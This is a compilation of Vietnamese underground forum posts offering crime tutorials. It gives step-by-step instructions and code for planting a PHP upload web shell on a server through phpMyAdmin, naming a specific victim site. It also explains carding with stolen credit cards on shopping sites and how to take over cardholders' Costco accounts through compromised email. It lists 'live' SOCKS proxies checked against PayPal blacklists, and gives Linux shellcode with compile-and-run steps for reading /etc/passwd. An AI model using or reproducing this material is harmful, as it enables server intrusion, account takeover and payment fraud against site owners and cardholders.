[Tut] Upshell PhpMyAdmin

Vì là newbie nên chưa có tut gì đóng góp cho diễn đan. Hôm nay mạo muội post tut upshell via phpmyadmin. Có gì khiếm khuyết mong các ACE trong rum bỏ quá cho.

Bước 1: Tìm Path của document root

+ Vào link http://www.victim.com/xampp/
Ví dụ: http://www.ehtpe.co.cu/xampp/





+ Vào Php infor() để xem path document root : C:/xampp/htdocs 





Bước 2: Loggin và cơ sở dữ liệu: 

+) http://www.ehtpe.co.cu/phpmyadmin

Bước 3: Tạo Database mới

Ví dụ: VHB_Group.

Sử dụng query:

CREATE DATABASE  VHB_Group;

Hoặc như hình minh họa dưới:



Bước 4: Tạo table mới

+) Trong database VHB_Group vừa tạo, tạo table mới, đặt tên là soleil, sử dụng query sau:

CREATE TABLE soleil (contentshell varchar(10000) not null)      

Bước 5: Chèn code shell

+) Chèn code shell upload vào table Soleil vừa được tạo, sử dụng query sau:

Quote

INSERT INTO soleil VALUES ('<?php
if ($HTTP_POST_VARS[\'submit\'])
{
if (!is_uploaded_file($HTTP_POST_FILES[\'file\'][\'tmp_name\']))
{
$error = "You did not upload a file!";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//A file was uploaded
$maxfilesize=300000;
if ($HTTP_POST_FILES[\'file\'][\'size\'] > $maxfilesize)
{
$error = "File is too large.";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//File has passed all validation, copy it to the final destination and remove the temporary file:
copy($HTTP_POST_FILES[\'file\'][\'tmp_name\'],$HTTP_POST_FILES[\'file\'][\'name\']);
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
print "File has been successfully uploaded!";
exit;
}
}
}
?>

<html>
<head></head>
<body>
<form action="<?=$PHP_SELF?>" method="post" enctype="multipart/form-data">
<br><br>
Choose a file to upload:<br>
<input type="file" name="file"><br>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>');

Bước 6: Export file php 

Sử dụng querry:

SELECT * INTO DUMPFILE 'path/upload.php' from table_name;

Path: là path của document root.
Ví dụ:

SELECT * INTO DUMPFILE ' C:/xampp/htdocs /upload.php' from soleil;

Bước 7: Chạy Shell

Run shell theo đường link: http://domain/upload.php
Ví dụ: http://www.ehtpe.co.cu/upload.php



Sử dụng shell upload.php chúng ta có thể upload bất kỳ shell nào:

[CCN] Nước hoa các loại...

Click this bar to view the small image.

Site :
http://strawberrynet.com

CCN 
Sock = state
ship về địa chỉ nhà của mình bên hồng kông nhé 
oder đến Security code thì ko cần điền gì nhé

Electronics+Clothing+Fragrance ĐỦ Loại linh tinh khác

1> direct
CCV inter

bill = ship 

sock từa lưa
mail hotmail
time us

Tùy từng mặt hàng sẽ ship inter
2> drop
bill= ship or # ship
sock us


site:

Nếu có vấn đề về SOCK xin liên hệ Admin

https://www.sears.com

[TUT] Ship www.costco.com to VN

http://costco.com/
nguyên liệu :
- check mail pass tìm account shipped costco (vào mail find key word costco)
tìm thấy mail có order shipped, nếu pass ko phải account costco thì chờ khoảng 7h tối us(tùy bạn cảm thấy lúc nào chủ thẻ ko login là được) vào trang costco mà change pass,sau khi change pass xóa ngay cái mail change,ta sẽ có account,sau đó vào account change cái mail của nó
thành mail của mình .(rồi để đó sang hôm sau làm)
- sau khi làm bước trên vào giờ làm việc các bạn vào trang của nó chọn 1 món
hàng cần ship ,đến phần checkout login acc ,change shipping add(nhưng đừng chọn nút save add ),sang trang checkout acc có sẵn cc nhưng ko có ccv
chúng ta điền 000 vào và revi
State US: -còn nếu place ko thành công các bạn tìm con cc trùng sta với add account
.change bill add và card (nhưng đừng save).lúc này nên chọn những cc visa fsa,fcu tiền nhiều,dễ charged
# khi order thành công sẽ có 1 mail báo nhận được order ngay
# khoảng 2-3h sau có 1 mail order sent fulfillment
#tùy vào món hàng bạn mua mà thời gian shipped khác nhau,khi order món hàng nó có ghi thời gian shipped là bao nhiêu ngày(nikon,canon 7d 3-5 ngày laptop shipped hơi lâu 10-15 ngày)
State US: một account có thể ship thỏa mái,khi nào cc hết tiền thì thôi


tại sao phải càn account shipped đơn giản vì chúng ta có
membership number ,có cái này rất dễ ped
,chủ thẻ ko bất ngờ khi bank stament có chử costco.

Socks Live US Clear PayPal 06/02/2012

Live | 71.7.164.93:11536 | Times: 1.087659 | Paypal: Clear | City: Beaver Bank | State: Nova Scotia | Zipcode: Unknown | Areacode: Unknown | Country: Canada | From socklib http://tamhon.net
Live | 203.45.185.254:24081 | Times: 0.159315 | Paypal: Clear | City: Healesville | State: Victoria | Zipcode: Unknown | Areacode: Unknown | Country: Australia | From socklib http://tamhon.net
Live | 74.4.72.87:29435 | Times: 1.619257 | Paypal: Clear | City: Cape Coral | State: Florida | Zipcode: 33909 | Areacode: 239 | Country: United States | From socklib http://tamhon.net
Live | 67.160.211.95:1043 | Times: 0.513417 | Paypal: Clear | City: San Francisco | State: California | Zipcode: 94127 | Areacode: 415 | Country: United States | From socklib http://tamhon.net
Live | 99.44.63.195:30491 | Times: 3.745354 | Paypal: Clear | City: Los Angeles | State: California | Zipcode: 90018 | Areacode: 323 | Country: United States | From socklib http://tamhon.net
Live | 165.228.224.154:5799 | Times: 0.153967 | Paypal: Clear | City: Newport | State: New South Wales | Zipcode: Unknown | Areacode: Unknown | Country: Australia | From socklib http://tamhon.net
Live | 64.113.24.175:3069 | Times: 0.755155 | Paypal: Clear | City: Ephrata | State: Washington | Zipcode: 98823 | Areacode: 509 | Country: United States | From socklib http://tamhon.net
Live | 24.10.208.238:35899 | Times: 3.478146 | Paypal: Clear | City: Sandy | State: Utah | Zipcode: 84092 | Areacode: 801 | Country: United States | From socklib http://tamhon.net
Live | 78.29.103.187:8159 | Times: 1.610558 | Paypal: Clear | City: Saratov | State: Saratov | Zipcode: Unknown | Areacode: Unknown | Country: Russian Federation | From socklib http://tamhon.net
Live | 99.233.156.111:16475 | Times: 0.960122 | Paypal: Blacklist | City: Toronto | State: Ontario | Zipcode: Unknown | Areacode: Unknown | Country: Canada | From socklib http://tamhon.net
Live | 74.57.104.129:5642 | Times: 1.021344 | Paypal: Clear | City: Sainte-th�r�se | State: Quebec | Zipcode: Unknown | Areacode: Unknown | Country: Canada | From socklib http://tamhon.net
Live | 66.128.83.171:13180 | Times: 2.406171 | Paypal: Clear | City: Wolseley | State: Saskatchewan | Zipcode: Unknown | Areacode: Unknown | Country: Canada | From socklib http://tamhon.net
Live | 24.57.167.84:12407 | Times: 1.03268 | Paypal: Clear | City: Windsor | State: Ontario | Zipcode: Unknown | Areacode: Unknown | Country: Canada | From socklib http://tamhon.net
Live | 173.218.5.109:3713 | Times: 1.018815 | Paypal: Blacklist | City: Branson | State: Missouri | Zipcode: 65616 | Areacode: 417 | Country: United States | From socklib http://tamhon.net
Live | 24.13.90.134:7599 | Times: 0.976759 | Paypal: Clear | City: Homer | State: Illinois | Zipcode: 61849 | Areacode: 217 | Country: United States | From socklib http://tamhon.net
Live | 24.17.21.139:6953 | Times: 0.574345 | Paypal: Clear | City: Seattle | State: Washington | Zipcode: 98116 | Areacode: 206 | Country: United States | From socklib http://tamhon.net
Live | 24.196.104.93:8996 | Times: 1.093755 | Paypal: Clear | City: Delavan | State: Wisconsin | Zipcode: 53115 | Areacode: 262 | Country: United States | From socklib http://tamhon.net
Live | 24.47.4.100:8816 | Times: 1.016372 | Paypal: Clear | City: Shirley | State: New York | Zipcode: 11967 | Areacode: 631 | Country: United States | From socklib http://tamhon.net
Live | 50.133.211.195:5404 | Times: 1.11251 | Paypal: Clear | City: Dracut | State: Massachusetts | Zipcode: 01826 | Areacode: 978 | Country: United States | From socklib http://tamhon.net
Live | 64.71.116.245:7043 | Times: 3.211265 | Paypal: Clear | City: Severy | State: Kansas | Zipcode: 67137 | Areacode: 620 | Country: United States | From socklib http://tamhon.net
Live | 68.111.227.24:4739 | Times: 0.767248 | Paypal: Clear | City: Escondido | State: California | Zipcode: 92027 | Areacode: 760 | Country: United States | From socklib http://tamhon.net
Live | 69.118.242.110:14169 | Times: 1.211967 | Paypal: Blacklist | City: Scarsdale | State: New York | Zipcode: 10583 | Areacode: 914 | Country: United States | From socklib http://tamhon.net
Live | 69.163.27.99:2820 | Times: 0.873774 | Paypal: Clear | City: Blue Earth | State: Minnesota | Zipcode: 56013 | Areacode: 507 | Country: United States | From socklib http://tamhon.net
Live | 70.60.178.9:58823 | Times: 1.00711 | Paypal: Clear | City: Barberton | State: Ohio | Zipcode: 44203 | Areacode: 330 | Country: United States | From socklib http://tamhon.net
Live | 74.137.203.228:3009 | Times: 0.953946 | Paypal: Clear | City: Henderson | State: Kentucky | Zipcode: 42420 | Areacode: 270 | Country: United States | From socklib http://tamhon.net
Live | 74.2.136.107:11315 | Times: 1.014899 | Paypal: Clear | City: Los Angeles | State: California | Zipcode: Unknown | Areacode: 323 | Country: United States | From socklib http://tamhon.net
Live | 74.60.197.198:54987 | Times: 1.142789 | Paypal: Clear | City: Duluth | State: Georgia | Zipcode: 30096 | Areacode: 770 | Country: United States | From socklib http://tamhon.net

hack Local (it can bypass chmod 400)

http://shell-storm.org/shellcode/files/shellcode-73.php



Chúng ta dùng shell code


/*
Linux/x86 file reader.

65 bytes + pathname
Author: certaindeath

Source code:
_start:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two

one:
pop %ebx

movb $5, %al
xor %ecx, %ecx
int $0x80

mov %eax, %esi
jmp read

exit:
movb $1, %al
xor %ebx, %ebx
int $0x80

read:
mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80

xor %ebx, %ebx
cmp %eax, %ebx
je exit

movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80

add $1, %esp
jmp read

two:
call one
.string "file_name"
*/
char main[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
"\x80\x89\xc6\xeb\x06\xb0\x01\x31"
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
"\x04\xb3\x01\xb2\x01\xcd\x80\x83"
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
"\xff"
"/etc/passwd"; //Put here the file path, default is /etc/passwd

Shellcode này giúp chúng ta view đc file bất kì khi sử dụng và thay đổi path /etc/passwd thành path cần view thôi.
Cách thực hiện.
Save dưới dạng file exploit.c
Sau đó compile lại bằng lệnh 
gcc -o exploit exploit.c

Trông như get root vậy
Sau đó sẽ xuất hiện file exploit
Nâng file đấy lên thành 777.Dùng lệnh
Chmod +x exploit

Và cuối cùng là 
./exploit

Kết quả là ta đọc đc file /etc/passwd
Rất giống getroot phải ko 
Cách thực hiện rất dễ.
GCC.ZIP

Nhiều server cấm lệnh gcc thì bạn có thể dùng file gcc ở 1 server linux nào đó.Máy ảo chẳng hạn.Up lên rồi chmod 777 rồi ./gcc để thực hiện lệnh....

Ngoài ra các bạn có thể làm tắt server bằng file exploit sau đây.

http://shell-storm.org/shellcode/files/shellcode-68.php